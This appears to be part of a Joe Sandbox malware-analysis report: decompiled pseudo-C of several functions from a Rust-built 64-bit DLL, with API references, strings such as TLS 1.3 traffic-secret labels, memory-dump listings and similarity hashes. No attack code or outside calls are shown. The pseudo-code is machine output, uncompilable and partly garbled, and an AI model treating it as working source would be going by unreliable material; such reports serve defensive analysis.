Function 000007FEF30A3B10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,000007FEF30BB835), ref: 000007FEF30A3B2F
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,000007FEF30BB835), ref: 000007FEF30A3B59
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000007FEF30BB835), ref: 000007FEF30A3C22
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000007FEF30BB835), ref: 000007FEF30A3C5E

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30A3C40, 000007FEF30A3C7C
attempt to divide by zero/rustc/7eef946fc0e0eff40e588eab77b09b287accbec3\library\core\src\char\methods.rs, xrefs: 000007FEF30A3C08

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ErrorLastPerformanceQuery$CounterFrequency
String ID: attempt to divide by zero/rustc/7eef946fc0e0eff40e588eab77b09b287accbec3\library\core\src\char\methods.rs$called `Result::unwrap()` on an `Err` value
API String ID: 2984914903-3599439405
Opcode ID: e745c7267ba25214f8015e3753ba7183495476a375ac0fe4f9a1f1dc5fdd12c5
Instruction ID: 9c166769d3d30b813b22599a64bc6abb1be9a14ccd4da5b6b0d567118959cede
Opcode Fuzzy Hash: e745c7267ba25214f8015e3753ba7183495476a375ac0fe4f9a1f1dc5fdd12c5
Instruction Fuzzy Hash: E8418BB2F08A4699FF98DB65E8043B963E6A784794F048633C94D437A8DF3CE516D340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30999F0 Relevance: 9.1, APIs: 6, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E000007FE7FEF30999F0(void* __esi, long long __rax, long long __rcx, void* __r8) {
				long _t19;
				void* _t27;
				void* _t30;
				void* _t33;
				long long _t47;
				void* _t49;
				long long _t50;
				long long _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t68;
				intOrPtr _t70;
				void* _t72;

				_t64 = _t65 + 0x80;
				 *((long long*)(_t64 + 0x3f0)) = 0xfffffffe;
				 *((long long*)(_t64 + 0x3e0)) = __rcx;
				 *((long long*)(_t64 + 0x3c8)) = 2;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp+0x3d0], xmm0");
				r8d = 0x200;
				 *((long long*)(_t64 + 0x3e8)) = __rax;
				r12d = 0;
				r15d = 0;
				_t33 = __r8 - 0x201;
				if (_t33 >= 0) goto 0xf3099a80;
				goto 0xf3099a6f;
				asm("o16 nop [eax+eax]");
				if (_t33 >= 0) goto 0xf3099b3e;
				if (__r8 - 0x201 >= 0) goto 0xf3099a80;
				r13d = 0x200;
				goto 0xf3099ad7;
				_t67 = __r8 - _t49;
				if (_t72 - _t49 - _t67 >= 0) goto 0xf3099aaf;
				_t7 = _t64 + 0x3c8; // 0x5c8
				E000007FE7FEF30FF950(_t27, _t30, _t72 - _t49 - _t67, _t7, _t49, _t67);
				_t47 =  *((intOrPtr*)(_t64 + 0x3c8));
				 *((long long*)(_t64 + 0x3e8)) = _t47;
				_t70 =  *((intOrPtr*)(_t64 + 0x3d0));
				_t50 =  <  ? _t70 : _t49;
				 *((long long*)(_t64 + 0x3d8)) = _t50;
				_t61 = _t50;
				SetLastError(??);
				_t19 = GetCurrentDirectoryW(??, ??);
				r14d = _t19;
				if (_t19 != 0) goto 0xf3099aff;
				if (GetLastError() != 0) goto 0xf3099ba2;
				r8d = r14d;
				if (_t61 != _t67) goto 0xf3099a60;
				if (GetLastError() != 0x7a) goto 0xf3099bc5;
				_t62 = _t61 + _t61;
				_t63 =  >=  ? _t47 : _t62;
				_t68 =  >=  ? _t47 : _t62;
				if (_t68 - 0x201 < 0) goto 0xf3099a6f;
				goto 0xf3099a80;
				if (_t50 - _t68 < 0) goto 0xf3099bdf;
				E000007FE7FEF309ABD0(0xffffffff, _t30, _t47, _t64 + 0x3a8,  *((intOrPtr*)(_t64 + 0x3e8)), _t68);
				asm("movups xmm0, [ebp+0x3a8]");
				asm("movups xmm1, [ebp+0x3b8]");
				asm("movups [eax+0x10], xmm1");
				asm("movups [eax], xmm0");
				if (_t70 == 0) goto 0xf3099b8d;
				return HeapFree(??, ??, ??);
			}

0x7fef3099a03
0x7fef3099a0b
0x7fef3099a16
0x7fef3099a1d
0x7fef3099a28
0x7fef3099a2b
0x7fef3099a32
0x7fef3099a3d
0x7fef3099a44
0x7fef3099a47
0x7fef3099a4c
0x7fef3099a53
0x7fef3099a55
0x7fef3099a57
0x7fef3099a60
0x7fef3099a6d
0x7fef3099a6f
0x7fef3099a7c
0x7fef3099a80
0x7fef3099a89
0x7fef3099a8b
0x7fef3099a95
0x7fef3099a9a
0x7fef3099aa1
0x7fef3099aa8
0x7fef3099abc
0x7fef3099ac0
0x7fef3099ad4
0x7fef3099ad9
0x7fef3099ae4
0x7fef3099aea
0x7fef3099aef
0x7fef3099af9
0x7fef3099aff
0x7fef3099b05
0x7fef3099b14
0x7fef3099b1a
0x7fef3099b25
0x7fef3099b29
0x7fef3099b33
0x7fef3099b39
0x7fef3099b41
0x7fef3099b51
0x7fef3099b56
0x7fef3099b5d
0x7fef3099b6b
0x7fef3099b6f
0x7fef3099b75
0x7fef3099ba1

APIs

SetLastError.KERNEL32 ref: 000007FEF3099AD9
GetCurrentDirectoryW.KERNEL32 ref: 000007FEF3099AE4
GetLastError.KERNEL32 ref: 000007FEF3099AF1
GetLastError.KERNEL32 ref: 000007FEF3099B0B
HeapFree.KERNEL32 ref: 000007FEF3099B87
GetLastError.KERNEL32 ref: 000007FEF3099BA2

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ErrorLast$CurrentDirectoryFreeHeap
String ID:
API String ID: 3778299094-0
Opcode ID: 39558aba90f18b217d9d0b04325fc8d567629197e060fe37747d760864010598
Instruction ID: 1bc918f4eb0f684900d4404455f81035d3361d8f4a1a4b3b032845af656db91a
Opcode Fuzzy Hash: 39558aba90f18b217d9d0b04325fc8d567629197e060fe37747d760864010598
Instruction Fuzzy Hash: 6B51D332E097C18EE7A18F66AD447F92396F349BA8F044233DD5D167E5EE3C9681D200

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3074EDD Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 290
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E000007FE7FEF3074EDD(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rcx, void* __rdx, intOrPtr* __r8, void* __r9, void* _a40, intOrPtr _a48, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72) {
				char _v384;
				intOrPtr* _v392;
				char _v456;
				char _v536;
				void* _v616;
				long long _v632;
				long long _v640;
				void* _v832;
				long long _v840;
				long long _v848;
				long long _v856;
				char _v920;
				intOrPtr* _v928;
				char _v992;
				char _v1016;
				long long _v1020;
				long long _v1024;
				long long _v1032;
				long long _v1040;
				long long _v1048;
				long long _v1056;
				long long _v1064;
				void* _v1076;
				int _t54;
				void* _t58;
				intOrPtr _t87;
				void* _t89;
				intOrPtr* _t114;
				void* _t120;
				long long _t143;
				intOrPtr* _t144;
				char* _t145;

				_t58 = __edx;
				_t55 = __ecx;
				asm("movaps [esp+0x400], xmm6");
				_t144 = __r8;
				_t89 = __rdx;
				_t114 =  &_v1016;
				 *_t114 = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [edi+0x8], xmm0");
				E000007FE7FEF306901E(_t114, _a48, _a56 + _a48);
				E000007FE7FEF306901E(_t114, _a64, _a72 + _a64);
				0xf306aaa0();
				_v1064 =  *_t114;
				_v1024 =  *((intOrPtr*)(_t114 + 0x10));
				E000007FE7FEF306AD73(__ecx, __edi, __esi, __esp,  &_v992,  *_t114,  *((intOrPtr*)(_t114 + 0x10)));
				_t143 =  *_t144;
				_v920 = _t143;
				if (_t143 == 0) goto 0xf3075223;
				if (_t89 == 0) goto 0xf30751a1;
				_t145 =  &_v536;
				_v1032 =  *((intOrPtr*)(_t145 - 0x10));
				_v1040 =  *((intOrPtr*)(_t145 - 8));
				_v1048 =  *((intOrPtr*)(_t145 + 0x40));
				_v1056 =  *((intOrPtr*)(_t145 + 0x48));
				asm("xorps xmm6, xmm6");
				_t120 =  <  ? _t89 : _t143;
				if ( *_v928 - 0x41 >= 0) goto 0xf30751d9;
				asm("movups xmm0, [esp+0x1f0]");
				asm("movups xmm1, [esp+0x200]");
				asm("movups xmm2, [esp+0x210]");
				asm("movups xmm3, [esp+0x220]");
				asm("movaps [esp+0xf0], xmm3");
				asm("movaps [esp+0xe0], xmm2");
				asm("movaps [esp+0xd0], xmm1");
				asm("movaps [esp+0xc0], xmm0");
				asm("movups [ebp+0x70], xmm6");
				asm("movups [ebp+0x60], xmm6");
				asm("movups [ebp+0x50], xmm6");
				asm("movups [ebp+0x40], xmm6");
				asm("movups [ebp+0x30], xmm6");
				asm("movups [ebp+0x20], xmm6");
				asm("movups [ebp+0x10], xmm6");
				asm("movups [ebp], xmm6");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups [ebp+0xb0], xmm3");
				asm("movups [ebp+0xa0], xmm2");
				asm("movups [ebp+0x90], xmm1");
				asm("movups [ebp+0x80], xmm0");
				_v856 = _v1032;
				_v848 = _v1040;
				_v840 = 0;
				_v640 = _v1048;
				_v632 = _v1056;
				E000007FE7FEF3068A38( &_v920,  &_v992,  *_v928);
				E000007FE7FEF3068A38( &_v920, _v1064, _v1024);
				r8d = 0x128;
				E000007FE7FEF30F1E10();
				E000007FE7FEF3069BD8(__ecx, _t58, __edi, __esi, __esp,  &_v456,  &_v384);
				_t87 =  *_v392;
				if (_t87 - 0x41 >= 0) goto 0xf30751ed;
				if (_t120 - _t87 > 0) goto 0xf30751fe;
				E000007FE7FEF30F1E10();
				if ( *_v928 - 0x41 >= 0) goto 0xf307520d;
				E000007FE7FEF306AD73(_t55, __edi, __esi, __esp,  &_v384,  &_v992,  *_v928);
				memcpy(__edi, __esi, 9);
				if (_t89 - _t120 != 0) goto 0xf3074ff2;
				if (_v1020 == 0) goto 0xf30751bd;
				_t54 = HeapFree(??, ??, ??);
				asm("movaps xmm6, [esp+0x400]");
				return _t54;
			}

0x7fef3074edd
0x7fef3074edd
0x7fef3074ef0
0x7fef3074efb
0x7fef3074efe
0x7fef3074f1c
0x7fef3074f21
0x7fef3074f28
0x7fef3074f2b
0x7fef3074f3d
0x7fef3074f53
0x7fef3074f73
0x7fef3074f80
0x7fef3074f88
0x7fef3074f90
0x7fef3074f95
0x7fef3074f99
0x7fef3074fa4
0x7fef3074fad
0x7fef3074fb3
0x7fef3074fbf
0x7fef3074fc8
0x7fef3074fd9
0x7fef3074fe2
0x7fef3074fe7
0x7fef3074ff8
0x7fef307500b
0x7fef3075011
0x7fef3075019
0x7fef3075021
0x7fef3075029
0x7fef3075031
0x7fef3075039
0x7fef3075041
0x7fef3075049
0x7fef3075051
0x7fef3075055
0x7fef3075059
0x7fef307505d
0x7fef3075061
0x7fef3075065
0x7fef3075069
0x7fef307506d
0x7fef3075071
0x7fef3075076
0x7fef307507b
0x7fef3075080
0x7fef3075085
0x7fef307508c
0x7fef3075093
0x7fef307509a
0x7fef30750a6
0x7fef30750b3
0x7fef30750bb
0x7fef30750cc
0x7fef30750d9
0x7fef30750f1
0x7fef3075103
0x7fef3075108
0x7fef3075114
0x7fef3075124
0x7fef3075131
0x7fef3075138
0x7fef3075141
0x7fef3075155
0x7fef3075169
0x7fef3075188
0x7fef3075195
0x7fef307519b
0x7fef30751a7
0x7fef30751b7
0x7fef30751bd
0x7fef30751d8

APIs

HeapFree.KERNEL32 ref: 000007FEF30751B7

Strings

derivedres masterexp masters ap trafficc ap traffics hs trafficc hs trafficc e trafficres binderEXPORTER_SECRETSERVER_TRAFFIC_SECRET_0CLIENT_TRAFFIC_SECRET_0SERVER_HANDSHAKE_TRAFFIC_SECRETCLIENT_HANDSHAKE_TRAFFIC_SECRETCLIENT_EARLY_TRAFFIC_SECRET. lib.rs\src\t, xrefs: 000007FEF3075315
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF3075243, 000007FEF3075296
tls13 , xrefs: 000007FEF3075300
client finishedserver finishedassertion failed: context.len() <= 0xffff, xrefs: 000007FEF3074EDF

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$client finishedserver finishedassertion failed: context.len() <= 0xffff$derivedres masterexp masters ap trafficc ap traffics hs trafficc hs trafficc e trafficres binderEXPORTER_SECRETSERVER_TRAFFIC_SECRET_0CLIENT_TRAFFIC_SECRET_0SERVER_HANDSHAKE_TRAFFIC_SECRETCLIENT_HANDSHAKE_TRAFFIC_SECRETCLIENT_EARLY_TRAFFIC_SECRET. lib.rs\src\t$tls13
API String ID: 3298025750-3639153238
Opcode ID: f9c0bfa2b6b5ab0c900b168fe3282e976fc99012e33334a43e016574603bf9e8
Instruction ID: 27ecfd73e89d29f5b995ccbe6ccec5d22e43b7a7d9b36ba555a17a51682323e2
Opcode Fuzzy Hash: f9c0bfa2b6b5ab0c900b168fe3282e976fc99012e33334a43e016574603bf9e8
Instruction Fuzzy Hash: E9D18C76A08BC585EBA0CB15E8403EAB3A5F799B84F409126EF8C13B69DF3CD195D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A4E90 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 152
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000007FE7FEF30A4E90(void* __edx, void* __eflags, intOrPtr* __rcx, void* __rdx, void* __r8) {
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed int _t61;
				void* _t80;
				signed char* _t103;
				signed char _t106;
				signed char* _t107;
				signed char* _t110;
				signed char* _t111;
				signed char _t114;
				long long* _t141;
				void* _t142;
				signed char** _t145;
				void* _t146;

				_t145 = _t146 + 0x80;
				_t145[2] = 0xfffffffe;
				_t142 = __rdx;
				_t141 = __rcx;
				 *((long long*)(_t145 - 0x30)) =  *((intOrPtr*)(__rcx));
				 *((long long*)(_t145 - 0x28)) = 0x7fef3096a50;
				 *((long long*)(_t145 - 0x20)) =  *((intOrPtr*)(__rcx + 8));
				 *((long long*)(_t145 - 0x18)) = 0x7fef3096a50;
				 *(_t145 - 0x10) =  *((intOrPtr*)(__rcx + 0x10));
				 *((long long*)(_t145 - 8)) = 0xf30a51e0;
				 *((long long*)(_t145 - 0x60)) = 0xf31260e8;
				 *((long long*)(_t145 - 0x58)) = 4;
				 *((long long*)(_t145 - 0x50)) = 0;
				_t103 = _t145 - 0x30;
				 *(_t145 - 0x40) = _t103;
				 *((long long*)(_t145 - 0x38)) = 3;
				_t50 = E000007FE7FEF3096D90(__edx, _t80, __eflags, __rdx);
				if (_t103 == 0) goto 0xf30a4f82;
				if ((_t50 & 0x00000003) != 1) goto 0xf30a4f82;
				_t145[1] = _t103 - 1;
				 *_t145 = _t103;
				 *(_t103[7])();
				_t106 = ( *_t145)[7];
				if ( *((long long*)(_t106 + 8)) == 0) goto 0xf30a4f70;
				if ( *((long long*)(_t106 + 0x10)) - 0x11 < 0) goto 0xf30a4f61;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				_t107 =  *((intOrPtr*)(_t141 + 0x18));
				_t54 =  *_t107 & 0x000000ff;
				if (_t107 == 3) goto 0xf30a50d0;
				if (_t54 == 2) goto 0xf30a4fdf;
				if (_t54 != 1) goto 0xf30a505a;
				_t55 = E000007FE7FEF30A5270(1, _t142);
				if (_t107 == 0) goto 0xf30a50d0;
				if ((_t55 & 0x00000003) != 1) goto 0xf30a50d0;
				_t145[1] = _t107 - 1;
				 *_t145 = _t107;
				 *(_t107[7])();
				goto 0xf30a5088;
				 *0xf319c3ba = 0;
				if ( *0xf319c3ba == 0) goto 0xf30a50d0;
				 *((long long*)(_t145 - 0x30)) = 0xf3126178;
				 *((long long*)(_t145 - 0x28)) = 1;
				 *((long long*)(_t145 - 0x20)) = 0;
				_t110 = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *(_t145 - 0x10) = _t110;
				 *((long long*)(_t145 - 8)) = 0;
				_t59 = E000007FE7FEF3096D90(1, _t80,  *0xf319c3ba, _t142);
				if (_t110 == 0) goto 0xf30a50d0;
				if ((_t59 & 0x00000003) != 1) goto 0xf30a50d0;
				_t145[1] = _t110 - 1;
				 *_t145 = _t110;
				_t111 = _t110[7];
				 *_t111();
				goto 0xf30a5088;
				_t61 = E000007FE7FEF30A5270(0,  *(_t110 - 1));
				if (_t111 == 0) goto 0xf30a50d0;
				if ((_t61 & 0x00000003) != 1) goto 0xf30a50d0;
				_t145[1] = _t111 - 1;
				 *_t145 = _t111;
				 *(_t111[7])();
				_t114 = ( *_t145)[7];
				if ( *((long long*)(_t114 + 8)) == 0) goto 0xf30a50ba;
				if ( *((long long*)(_t114 + 0x10)) - 0x11 < 0) goto 0xf30a50a9;
				HeapFree(??, ??, ??);
				goto 0xf30a50be;
				return HeapFree(??, ??, ??);
			}

0x7fef30a4e9b
0x7fef30a4ea3
0x7fef30a4eab
0x7fef30a4eae
0x7fef30a4ebc
0x7fef30a4ec7
0x7fef30a4ecb
0x7fef30a4ecf
0x7fef30a4ed3
0x7fef30a4ede
0x7fef30a4ee9
0x7fef30a4eed
0x7fef30a4ef5
0x7fef30a4efd
0x7fef30a4f01
0x7fef30a4f05
0x7fef30a4f14
0x7fef30a4f1c
0x7fef30a4f26
0x7fef30a4f2e
0x7fef30a4f36
0x7fef30a4f3e
0x7fef30a4f44
0x7fef30a4f51
0x7fef30a4f5b
0x7fef30a4f6a
0x7fef30a4f7c
0x7fef30a4f82
0x7fef30a4f86
0x7fef30a4f8d
0x7fef30a4f96
0x7fef30a4f9e
0x7fef30a4fa6
0x7fef30a4fae
0x7fef30a4fbc
0x7fef30a4fc8
0x7fef30a4fd0
0x7fef30a4fd8
0x7fef30a4fda
0x7fef30a4fe1
0x7fef30a4fe9
0x7fef30a4ff6
0x7fef30a4ffa
0x7fef30a5002
0x7fef30a500a
0x7fef30a5011
0x7fef30a5015
0x7fef30a5024
0x7fef30a502c
0x7fef30a503a
0x7fef30a5046
0x7fef30a504e
0x7fef30a5052
0x7fef30a5056
0x7fef30a5058
0x7fef30a505c
0x7fef30a5064
0x7fef30a506e
0x7fef30a5076
0x7fef30a507e
0x7fef30a5086
0x7fef30a508c
0x7fef30a5095
0x7fef30a50a3
0x7fef30a50b2
0x7fef30a50b8
0x7fef30a50dc

APIs

HeapFree.KERNEL32 ref: 000007FEF30A4F6A
HeapFree.KERNEL32 ref: 000007FEF30A4F7C
HeapFree.KERNEL32 ref: 000007FEF30A50B2
HeapFree.KERNEL32 ref: 000007FEF30A50CA

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30A500A

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 3298025750-1586615424
Opcode ID: 06baf50513faa132a5db737ae8951c567fb3087e0f4fbe0a4f4d382b8e3d77e6
Instruction ID: 3ee73aa6f163b88753b76ff2e38aef81a0c3a6236353665bc3380c82bcbff338
Opcode Fuzzy Hash: 06baf50513faa132a5db737ae8951c567fb3087e0f4fbe0a4f4d382b8e3d77e6
Instruction Fuzzy Hash: 39614836A05B4588EB90CB61E8943BC33F2F789B94F448026DA8D477A8DF38D545E380

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30BCAD3 Relevance: 6.4, APIs: 5, Instructions: 167
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E000007FE7FEF30BCAD3(void* __ebx, void* __edx, void* __edi, void* __ebp, void* __rax, void* __rcx, void* __rdx, long long __r8, long long __r9, void* __r11) {
				int _t78;
				long long _t109;
				long long* _t112;
				long long* _t116;
				long long* _t117;
				long long _t132;
				long long* _t138;
				long long* _t140;
				long long _t141;
				long long* _t142;
				long long _t144;
				void* _t146;
				long long _t147;
				long long _t149;
				void* _t150;
				long long _t162;
				long long _t163;
				void* _t164;
				long long _t165;

				_t165 = __r9;
				_t163 = __r8;
				_t146 = __rdx;
				_t164 = __rcx;
				if ( *((intOrPtr*)(__rdx + 0x18)) == 0) goto 0xf30bcb34;
				_t143 =  *((intOrPtr*)(__rdx + 0x30));
				if ( *((intOrPtr*)(__rdx + 0x30)) == 0) goto 0xf30bcb34;
				_t116 = _t150 + 0x78;
				E000007FE7FEF3051C30(__rax, _t116,  *((intOrPtr*)(__rdx + 0x18)),  *((intOrPtr*)(__rdx + 0x28)));
				if ( *_t116 == 0) goto 0xf30bcb4a;
				 *((long long*)(_t150 + 0x50)) =  *((intOrPtr*)(_t150 + 0x88));
				asm("movups xmm0, [esp+0x78]");
				asm("movaps [esp+0x40], xmm0");
				goto 0xf30bcb5b;
				 *((long long*)(_t150 + 0x20)) = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x28], xmm0");
				goto 0xf30bcce8;
				 *((long long*)(_t150 + 0x40)) = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x48], xmm0");
				_t117 = _t150 + 0x78;
				E000007FE7FEF3051C30( *((intOrPtr*)(_t150 + 0x88)), _t117, _t143,  *((intOrPtr*)(_t146 + 0x40)));
				if ( *_t117 == 0) goto 0xf30bcb8e;
				 *((long long*)(_t150 + 0x30)) =  *((intOrPtr*)(_t150 + 0x88));
				asm("movups xmm0, [esp+0x78]");
				asm("movaps [esp+0x20], xmm0");
				goto 0xf30bcb9f;
				 *((long long*)(_t150 + 0x20)) = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x28], xmm0");
				_t109 = _t150 + 0xc8;
				 *_t109 = _t150 + 0x40;
				 *((long long*)(_t109 + 8)) = 0x7fef3051250;
				_t144 = _t150 + 0x20;
				 *((long long*)(_t109 + 0x10)) = _t144;
				 *((long long*)(_t109 + 0x18)) = 0x7fef3051250;
				_t138 = _t150 + 0x78;
				 *_t138 = 0xf314bb18;
				 *((long long*)(_t138 + 8)) = 0xf314bb18;
				 *((long long*)(_t138 + 0x10)) = 0;
				 *((long long*)(_t138 + 0x20)) = _t109;
				 *((long long*)(_t138 + 0x28)) = 0xf314bb18;
				E000007FE7FEF3051840(_t150 + 0x60, _t138);
				if ( *((long long*)(_t144 + 8)) == 0) goto 0xf30bcc14;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t150 + 0x48)) == 0) goto 0xf30bcc30;
				_t78 = HeapFree(??, ??, ??);
				_t162 = _t150 + 0xc8;
				E000007FE7FEF30B209F(_t78, 2,  *((long long*)(_t150 + 0x48)), _t162,  *((intOrPtr*)(_t150 + 0x60)),  *((intOrPtr*)(_t150 + 0x70)), __r11);
				if ( *((intOrPtr*)(_t150 + 0x68)) == 0) goto 0xf30bcc69;
				HeapFree(??, ??, ??);
				if ( *((char*)(_t146 + 0x4c)) == 0) goto 0xf30bcc82;
				 *((long long*)(_t150 + 0x20)) = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x28], xmm0");
				goto 0xf30bccc6;
				 *((long long*)(_t150 + 0x40)) = _t162;
				 *((long long*)(_t150 + 0x48)) = 0x7fef3051250;
				_t140 = _t150 + 0x78;
				 *_t140 = 0xf314bb58;
				 *((long long*)(_t140 + 8)) = 2;
				 *((long long*)(_t140 + 0x10)) = 0;
				 *((long long*)(_t140 + 0x20)) = _t150 + 0x40;
				 *((long long*)(_t140 + 0x28)) = 1;
				E000007FE7FEF3051840(_t150 + 0x20, _t140);
				if ( *((long long*)(_t150 + 0xd0)) == 0) goto 0xf30bcce8;
				HeapFree(??, ??, ??);
				_t112 = _t150 + 0x60;
				 *_t112 = _t163;
				 *((long long*)(_t112 + 8)) = _t165;
				_t132 = _t150 + 0x40;
				 *_t132 = _t163;
				 *((long long*)(_t132 + 8)) = _t165;
				_t149 = _t150 + 0x78;
				 *_t149 = _t112;
				 *((long long*)(_t149 + 8)) = 0x7fef3096a50;
				_t141 = _t150 + 0x160;
				 *((long long*)(_t149 + 0x10)) = _t141;
				 *((long long*)(_t149 + 0x18)) = 0x7fef3058eb0;
				 *((long long*)(_t149 + 0x20)) = _t132;
				 *((long long*)(_t149 + 0x28)) = 0x7fef3096a50;
				 *((long long*)(_t149 + 0x30)) = _t141;
				 *((long long*)(_t149 + 0x38)) = 0x7fef3058eb0;
				_t147 = _t150 + 0x20;
				 *((long long*)(_t149 + 0x40)) = _t147;
				 *((long long*)(_t149 + 0x48)) = 0x7fef3051250;
				_t142 = _t150 + 0xc8;
				 *_t142 = 0xf314bbd0;
				 *((long long*)(_t142 + 8)) = 6;
				 *((long long*)(_t142 + 0x10)) = 0;
				 *((long long*)(_t142 + 0x20)) = _t149;
				 *((long long*)(_t142 + 0x28)) = 5;
				E000007FE7FEF3051840(_t164, _t142);
				if ( *((long long*)(_t147 + 8)) == 0) goto 0xf30bcda0;
				return HeapFree(??, ??, ??);
			}

0x7fef30bcae6
0x7fef30bcae9
0x7fef30bcaec
0x7fef30bcaef
0x7fef30bcaf9
0x7fef30bcafb
0x7fef30bcb02
0x7fef30bcb08
0x7fef30bcb10
0x7fef30bcb19
0x7fef30bcb23
0x7fef30bcb28
0x7fef30bcb2d
0x7fef30bcb32
0x7fef30bcb34
0x7fef30bcb3d
0x7fef30bcb40
0x7fef30bcb45
0x7fef30bcb4a
0x7fef30bcb53
0x7fef30bcb56
0x7fef30bcb5f
0x7fef30bcb6a
0x7fef30bcb73
0x7fef30bcb7d
0x7fef30bcb82
0x7fef30bcb87
0x7fef30bcb8c
0x7fef30bcb8e
0x7fef30bcb97
0x7fef30bcb9a
0x7fef30bcba4
0x7fef30bcbac
0x7fef30bcbb6
0x7fef30bcbba
0x7fef30bcbbf
0x7fef30bcbc3
0x7fef30bcbce
0x7fef30bcbd3
0x7fef30bcbdb
0x7fef30bcbdf
0x7fef30bcbe7
0x7fef30bcbeb
0x7fef30bcbf4
0x7fef30bcbfe
0x7fef30bcc0e
0x7fef30bcc1a
0x7fef30bcc2a
0x7fef30bcc3f
0x7fef30bcc4d
0x7fef30bcc55
0x7fef30bcc63
0x7fef30bcc6d
0x7fef30bcc6f
0x7fef30bcc78
0x7fef30bcc7b
0x7fef30bcc80
0x7fef30bcc82
0x7fef30bcc87
0x7fef30bcc93
0x7fef30bcc98
0x7fef30bcc9b
0x7fef30bcca3
0x7fef30bccb0
0x7fef30bccb4
0x7fef30bccc1
0x7fef30bcccf
0x7fef30bcce2
0x7fef30bcce8
0x7fef30bcced
0x7fef30bccf0
0x7fef30bccf4
0x7fef30bccf9
